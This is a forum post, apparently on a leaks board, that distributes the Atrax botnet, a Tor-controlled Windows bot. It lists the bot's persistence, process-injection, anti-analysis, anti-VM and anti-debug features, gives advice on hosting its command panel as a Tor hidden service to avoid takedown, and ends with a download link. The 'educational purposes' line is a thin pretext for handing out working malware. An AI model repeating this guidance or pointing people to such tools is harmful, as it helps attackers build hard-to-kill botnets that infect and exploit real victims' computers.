Miscellaneous Leaks

Atrax Botnet (Tor Hidden Service, untraceable)

Submitted by sam3oul, , Thread ID: 43035

Thread Closed
06-08-2017, 01:45 PM
#1
Well, just posting it for educational purposes,

[b]INFO:

Programming language: C (No C++!)
OS: Win XP - 8.1 (all x86/x64)
Admin rights required: No
Special: Tor Integration, spawns no process -> x64/x86 Process injection, this is the first public bot which supports windows 8!
File size: ~1,2 MB (because of Tor integration and x64/x86 Code), you can get a free assembler web downloader ~2KB

Why Tor?
The bot communicates only via Tor with your panel. With Tor you can get a really nice anonymous Botnet. It is almost impossible (well, theoretically it is possible, but Silkroad is still online, so dont worry) to get your server ip and put your server down. You get a Tor onion domain and this domain cannot be blacklisted (lasts ?forever). So to sum up: If you dont do any configuration mistakes, your botnet will probably last very long.
You need a VPS or a dedicated server to host this tor botnet, because you need to set up a hidden service. Because of tor the botnet is consuming more hardware resources than typical botnets. Probably it is not possible to get a 10 Dollar/year VPS and trying to host over 1k victims.

Setting up hidden service instructions:
- https://www.torproje...service.html.en
- http://kendildonic.w...th-a-cheap-vps/
- A little manual to set it up on debian based linux systems is included

The bot consist of a core and various plugins/addons. Each plugin/addon costs some money. Every plugin also communicates over tor.
(If somebody is interested in developing a plugin -> contact me)


Some features:
- Autostart, Persistence
- x86/x64 Code, x86/x64 Injection with Heavens Gate technique
- Anti-Analyzer (Protection against e.g. anubis.iseclab.org, malwr.com)
- If you need: Anti-VM
- Anti-Debug/Anti-Hook Engine
- Doesn't use suspicious windows apis like GetProcAddress/GetModuleHandle
- Plugins are saved to disk with AES-128-CBC encryption (random key)
- Communication over tor is already encrypted, so no extra communication encryption
- Every Plugin and the core is watermarked. Leak -> No updates/support. (Yes updates are free)
- Everything UNICODE

[/b]

[b]Download Link:[/b]
[b][b]https://mega.nz/#!elRhmZ4C!TYYtXQs3c...mlLr2UGzjZ1giQ[/b][/b]

Users browsing this thread: 1 Guest(s)